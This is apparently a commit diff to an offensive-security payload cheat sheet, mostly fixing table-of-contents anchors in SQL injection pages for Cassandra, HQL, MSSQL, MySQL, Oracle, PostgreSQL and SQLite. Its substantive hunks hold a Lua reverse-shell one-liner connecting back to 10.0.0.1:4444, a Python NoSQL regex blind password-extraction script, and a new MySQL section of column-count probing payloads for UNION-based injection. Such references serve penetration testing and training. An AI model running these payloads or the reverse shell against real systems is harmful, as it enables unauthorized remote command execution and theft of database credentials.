commit
757e1c107e
|
@ -203,7 +203,7 @@ lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','424
|
|||
Windows and Linux
|
||||
|
||||
```powershell
|
||||
lua5.1 -e 'local host, port = "10.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
|
||||
lua5.1 -e 'local host, port = "10.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
|
||||
```
|
||||
|
||||
### NodeJS
|
||||
|
|
|
@ -89,8 +89,8 @@ while True:
|
|||
for c in string.printable:
|
||||
if c not in ['*','+','.','?','|']:
|
||||
payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c)
|
||||
r = requests.post(u, data = payload, headers = headers, verify = False)
|
||||
if 'OK' in r.text:
|
||||
r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False)
|
||||
if 'OK' in r.text or r.status_code == 302:
|
||||
print("Found one more char : %s" % (password+c))
|
||||
password += c
|
||||
```
|
||||
|
|
|
@ -2,6 +2,14 @@
|
|||
|
||||
> Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system
|
||||
|
||||
## Summary
|
||||
|
||||
* [Cassandra comment](#cassandra-comment)
|
||||
* [Cassandra - Login Bypass](#cassandra---login-bypass)
|
||||
* [Login Bypass 0](#login-bypass-0)
|
||||
* [Login Bypass 1](#login-bypass-1)
|
||||
* [References](#references)
|
||||
|
||||
## Cassandra comment
|
||||
|
||||
```sql
|
||||
|
@ -34,4 +42,4 @@ Example from EternalNoob : [https://hack2learn.pw/cassandra/login.php](https://h
|
|||
|
||||
## References
|
||||
|
||||
* [Injection In Apache Cassandra – Part I - Rodolfo - EternalNoobs](https://eternalnoobs.com/injection-in-apache-cassandra-part-i/)
|
||||
* [Injection In Apache Cassandra – Part I - Rodolfo - EternalNoobs](https://eternalnoobs.com/injection-in-apache-cassandra-part-i/)
|
||||
|
|
|
@ -1,6 +1,12 @@
|
|||
# Hibernate Query Language Injection
|
||||
|
||||
> Hibernate ORM (Hibernate in short) is an object-relational mapping tool for the Java programming language. It provides a framework for mapping an object-oriented domain model to a relational database. - Wikipedia
|
||||
## Summary
|
||||
|
||||
* [HQL Comments](#hql-comments)
|
||||
* [HQL List Columns](#hql-list-columns)
|
||||
* [HQL Error Based](#hql-error-based)
|
||||
* [References](#references)
|
||||
|
||||
## HQL Comments
|
||||
|
||||
|
@ -49,4 +55,4 @@ select blogposts0_.id as id18_, blogposts0_.author as author18_, blogposts0_.pro
|
|||
* [How to put a comment into HQL (Hibernate Query Language)? - Thomas Bratt](https://stackoverflow.com/questions/3196975/how-to-put-a-comment-into-hql-hibernate-query-language)
|
||||
* [HQL : Hyperinsane Query Language - 04/06/2015 - Renaud Dubourguais](https://www.synacktiv.com/ressources/hql2sql_sstic_2015_en.pdf)
|
||||
* [ORM2Pwn: Exploiting injections in Hibernate ORM - Nov 26, 2015 - Mikhail Egorov](https://www.slideshare.net/0ang3el/orm2pwn-exploiting-injections-in-hibernate-orm)
|
||||
* [HQL Injection Exploitation in MySQL - July 18, 2019 - Olga Barinova](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hql-injection-exploitation-in-mysql/)
|
||||
* [HQL Injection Exploitation in MySQL - July 18, 2019 - Olga Barinova](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hql-injection-exploitation-in-mysql/)
|
||||
|
|
|
@ -5,18 +5,18 @@
|
|||
* [MSSQL comments](#mssql-comments)
|
||||
* [MSSQL version](#mssql-version)
|
||||
* [MSSQL database name](#mssql-database-name)
|
||||
* [MSSQL List databases](#mssql-list-database)
|
||||
* [MSSQL List databases](#mssql-list-databases)
|
||||
* [MSSQL List columns](#mssql-list-columns)
|
||||
* [MSSQL List tables](#mssql-list-tables)
|
||||
* [MSSQL Extract user/password](#mssql-extract-user-password)
|
||||
* [MSSQL Extract user/password](#mssql-extract-userpassword)
|
||||
* [MSSQL Union Based](#mssql-union-based)
|
||||
* [MSSQL Error Based](#mssql-error-based)
|
||||
* [MSSQL Blind Based](#mssql-blind-based)
|
||||
* [MSSQL Time Based](#mssql-time-based)
|
||||
* [MSSQL Stacked query](#mssql-stack-query)
|
||||
* [MSSQL Stacked query](#mssql-stacked-query)
|
||||
* [MSSQL Command execution](#mssql-command-execution)
|
||||
* [MSSQL UNC path](#mssql-unc-path)
|
||||
* [MSSQL Make user DBA](#mssql-make-user-dba)
|
||||
* [MSSQL Make user DBA](#mssql-make-user-dba-db-admin)
|
||||
|
||||
## MSSQL comments
|
||||
|
||||
|
|
|
@ -3,10 +3,10 @@
|
|||
## Summary
|
||||
|
||||
* [MYSQL Comment](#mysql-comment)
|
||||
* [Detect columns number](#detect-columns-number)
|
||||
* [MYSQL Union Based](#mysql-union-based)
|
||||
* [Extract database with information_schema](#extract-database-with-information-schema)
|
||||
* [Extract data without information_schema](#extract-data-without-information-schema)
|
||||
* [Detect columns number](#detect-columns-number)
|
||||
* [Extract database with information_schema](#extract-database-with-information_schema)
|
||||
* [Extract columns name without information_schema](#extract-columns-name-without-information_schema)
|
||||
* [Extract data without columns name](#extract-data-without-columns-name)
|
||||
* [MYSQL Error Based](#mysql-error-based)
|
||||
* [MYSQL Error Based - Basic](#mysql-error-based---basic)
|
||||
|
@ -15,10 +15,10 @@
|
|||
* [MYSQL Blind](#mysql-blind)
|
||||
* [MYSQL Blind with substring equivalent](#mysql-blind-with-substring-equivalent)
|
||||
* [MYSQL Blind using a conditional statement](#mysql-blind-using-a-conditional-statement)
|
||||
* [MYSQL Blind with MAKE_SET](#mysql-blind-with-make-set)
|
||||
* [MYSQL Blind with MAKE_SET](#mysql-blind-with-make_set)
|
||||
* [MYSQL Blind with LIKE](#mysql-blind-with-like)
|
||||
* [MYSQL Time Based](#mysql-time-based)
|
||||
* [Using SLEEP in a subselect](#using-asleep-in-a-subselect)
|
||||
* [Using SLEEP in a subselect](#using-sleep-in-a-subselect)
|
||||
* [Using conditional statements](#using-conditional-statements)
|
||||
* [MYSQL DIOS - Dump in One Shot](#mysql-dios---dump-in-one-shot)
|
||||
* [MYSQL Current queries](#mysql-current-queries)
|
||||
|
@ -46,17 +46,76 @@
|
|||
|
||||
## MYSQL Union Based
|
||||
|
||||
### Extract database with information_schema
|
||||
### Detect columns number
|
||||
|
||||
First you need to know the number of columns, you can use `order by`.
|
||||
First you need to know the number of columns
|
||||
|
||||
##### Using `order by` or `group by`
|
||||
|
||||
Keep incrementing the number until you get a False response.
|
||||
Even though GROUP BY and ORDER BY have different funcionality in SQL, they both can be used in the exact same fashion to determine the number of columns in the query.
|
||||
|
||||
```sql
|
||||
order by 1
|
||||
order by 2
|
||||
order by 3
|
||||
...
|
||||
order by XXX
|
||||
1' ORDER BY 1--+ #True
|
||||
1' ORDER BY 2--+ #True
|
||||
1' ORDER BY 3--+ #True
|
||||
1' ORDER BY 4--+ #False - Query is only using 3 columns
|
||||
#-1' UNION SELECT 1,2,3--+ True
|
||||
```
|
||||
or
|
||||
```sql
|
||||
1' GROUP BY 1--+ #True
|
||||
1' GROUP BY 2--+ #True
|
||||
1' GROUP BY 3--+ #True
|
||||
1' GROUP BY 4--+ #False - Query is only using 3 columns
|
||||
#-1' UNION SELECT 1,2,3--+ True
|
||||
```
|
||||
##### Using `order by` or `group by` Error Based
|
||||
Similar to the previous method, we can check the number of columns with 1 request if error showing is enabled.
|
||||
```sql
|
||||
1' ORDER BY 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100--+
|
||||
|
||||
# Unknown column '4' in 'order clause'
|
||||
# This error means query uses 3 column
|
||||
#-1' UNION SELECT 1,2,3--+ True
|
||||
```
|
||||
or
|
||||
```sql
|
||||
1' GROUP BY 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100--+
|
||||
|
||||
# Unknown column '4' in 'group statement'
|
||||
# This error means query uses 3 column
|
||||
#-1' UNION SELECT 1,2,3--+ True
|
||||
```
|
||||
##### Using `UNION SELECT` Error Based
|
||||
This method works if error showing is enabled
|
||||
```sql
|
||||
1' UNION SELECT @--+ #The used SELECT statements have a different number of columns
|
||||
1' UNION SELECT @,@--+ #The used SELECT statements have a different number of columns
|
||||
1' UNION SELECT @,@,@--+ #No error means query uses 3 column
|
||||
#-1' UNION SELECT 1,2,3--+ True
|
||||
```
|
||||
##### Using `LIMIT INTO` Error Based
|
||||
This method works if error showing is enabled.
|
||||
|
||||
It is useful for finding the number of columns when the injection point is after a LIMIT clause.
|
||||
```sql
|
||||
1' LIMIT 1,1 INTO @--+ #The used SELECT statements have a different number of columns
|
||||
1' LIMIT 1,1 INTO @,@--+ #The used SELECT statements have a different number of columns
|
||||
1' LIMIT 1,1 INTO @,@,@--+ #No error means query uses 3 column
|
||||
#-1' UNION SELECT 1,2,3--+ True
|
||||
```
|
||||
##### Using `SELECT * FROM SOME_EXISTING_TABLE` Error Based
|
||||
This works if you know the table name you're after and error showing is enabled.
|
||||
|
||||
It will return the amount of columns in the table, not the query.
|
||||
|
||||
```sql
|
||||
1' AND (SELECT * FROM Users) = 1--+ #Operand should contain 3 column(s)
|
||||
# This error means query uses 3 column
|
||||
#-1' UNION SELECT 1,2,3--+ True
|
||||
```
|
||||
### Extract database with information_schema
|
||||
|
||||
Then the following codes will extract the databases'name, tables'name, columns'name.
|
||||
|
||||
|
|
|
@ -1,5 +1,18 @@
|
|||
# Oracle SQL Injection
|
||||
|
||||
## Summary
|
||||
|
||||
* [Oracle SQL version](#oracle-sql-version)
|
||||
* [Oracle SQL database name](#oracle-sql-database-name)
|
||||
* [Oracle SQL List databases](#oracle-sql-list-databases)
|
||||
* [Oracle SQL List columns](#oracle-sql-list-columns)
|
||||
* [Oracle SQL List tables](#oracle-sql-list-tables)
|
||||
* [Oracle SQL Error Based](#oracle-sql-error-based)
|
||||
* [Oracle SQL Blind](#oracle-sql-blind)
|
||||
* [Oracle SQL Time Based](#oracle-sql-time-based)
|
||||
* [Oracle SQL Command execution](#oracle-sql-command-execution)
|
||||
* [References](#references)
|
||||
|
||||
## Oracle SQL version
|
||||
|
||||
```sql
|
||||
|
@ -21,7 +34,7 @@ SELECT SYS.DATABASE_NAME FROM DUAL;
|
|||
SELECT DISTINCT owner FROM all_tables;
|
||||
```
|
||||
|
||||
## Oracle SQL List Column
|
||||
## Oracle SQL List Columns
|
||||
|
||||
```sql
|
||||
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';
|
||||
|
|
|
@ -20,8 +20,8 @@
|
|||
* [PostgreSQL File Read](#postgresql-file-read)
|
||||
* [PostgreSQL File Write](#postgresql-file-write)
|
||||
* [PostgreSQL Command execution](#postgresql-command-execution)
|
||||
* [CVE-2019–9193](#cve-2019–9193)
|
||||
* [Using libc.so.6](#using-libc-so-6)
|
||||
* [CVE-2019–9193](#cve-20199193)
|
||||
* [Using libc.so.6](#using-libcso6)
|
||||
* [References](#references)
|
||||
|
||||
## PostgreSQL Comments
|
||||
|
|
|
@ -21,7 +21,7 @@ Attempting to manipulate SQL queries may have goals including:
|
|||
* [SQL injection using SQLmap](#sql-injection-using-sqlmap)
|
||||
* [Basic arguments for SQLmap](#basic-arguments-for-sqlmap)
|
||||
* [Load a request file and use mobile user-agent](#load-a-request-file-and-use-mobile-user-agent)
|
||||
* [Custom injection in UserAgent/Header/Referer/Cookie](#custom-injection-in-useragent-header-referer-cookie)
|
||||
* [Custom injection in UserAgent/Header/Referer/Cookie](#custom-injection-in-useragentheaderreferercookie)
|
||||
* [Second order injection](#second-order-injection)
|
||||
* [Shell](#shell)
|
||||
* [Crawl a website with SQLmap and auto-exploit](#crawl-a-website-with-sqlmap-and-auto-exploit)
|
||||
|
@ -29,7 +29,7 @@ Attempting to manipulate SQL queries may have goals including:
|
|||
* [Using a proxy with SQLmap](#using-a-proxy-with-sqlmap)
|
||||
* [Using Chrome cookie and a Proxy](#using-chrome-cookie-and-a-proxy)
|
||||
* [Using suffix to tamper the injection](#using-suffix-to-tamper-the-injection)
|
||||
* [General tamper option and tamper's list](#general-tamper-option-and-tamper-s-list)
|
||||
* [General tamper option and tamper's list](#general-tamper-option-and-tampers-list)
|
||||
* [Authentication bypass](#authentication-bypass)
|
||||
* [Polyglot injection](#polyglot-injection-multicontext)
|
||||
* [Routed injection](#routed-injection)
|
||||
|
|
|
@ -1,5 +1,18 @@
|
|||
# SQLite Injection
|
||||
|
||||
## Summary
|
||||
|
||||
* [SQLite comments](#sqlite-comments)
|
||||
* [SQLite version](#sqlite-version)
|
||||
* [Integer/String based - Extract table name](#integerstring-based---extract-table-name)
|
||||
* [Integer/String based - Extract column name](#integerstring-based---extract-column-name)
|
||||
* [Boolean - Count number of tables](#boolean---count-number-of-tables)
|
||||
* [Boolean - Enumerating table name](#boolean---enumerating-table-name)
|
||||
* [Boolean - Extract info](#boolean---extract-info)
|
||||
* [Time based](#time-based)
|
||||
* [Remote Command Execution using SQLite command - Attach Database](#remote-command-execution-using-sqlite-command---attach-database)
|
||||
* [Remote Command Execution using SQLite command - Load_extension](#remote-command-execution-using-sqlite-command---load_extension)
|
||||
* [References](#references)
|
||||
## SQLite comments
|
||||
|
||||
```sql
|
||||
|
|
Loading…
Reference in New Issue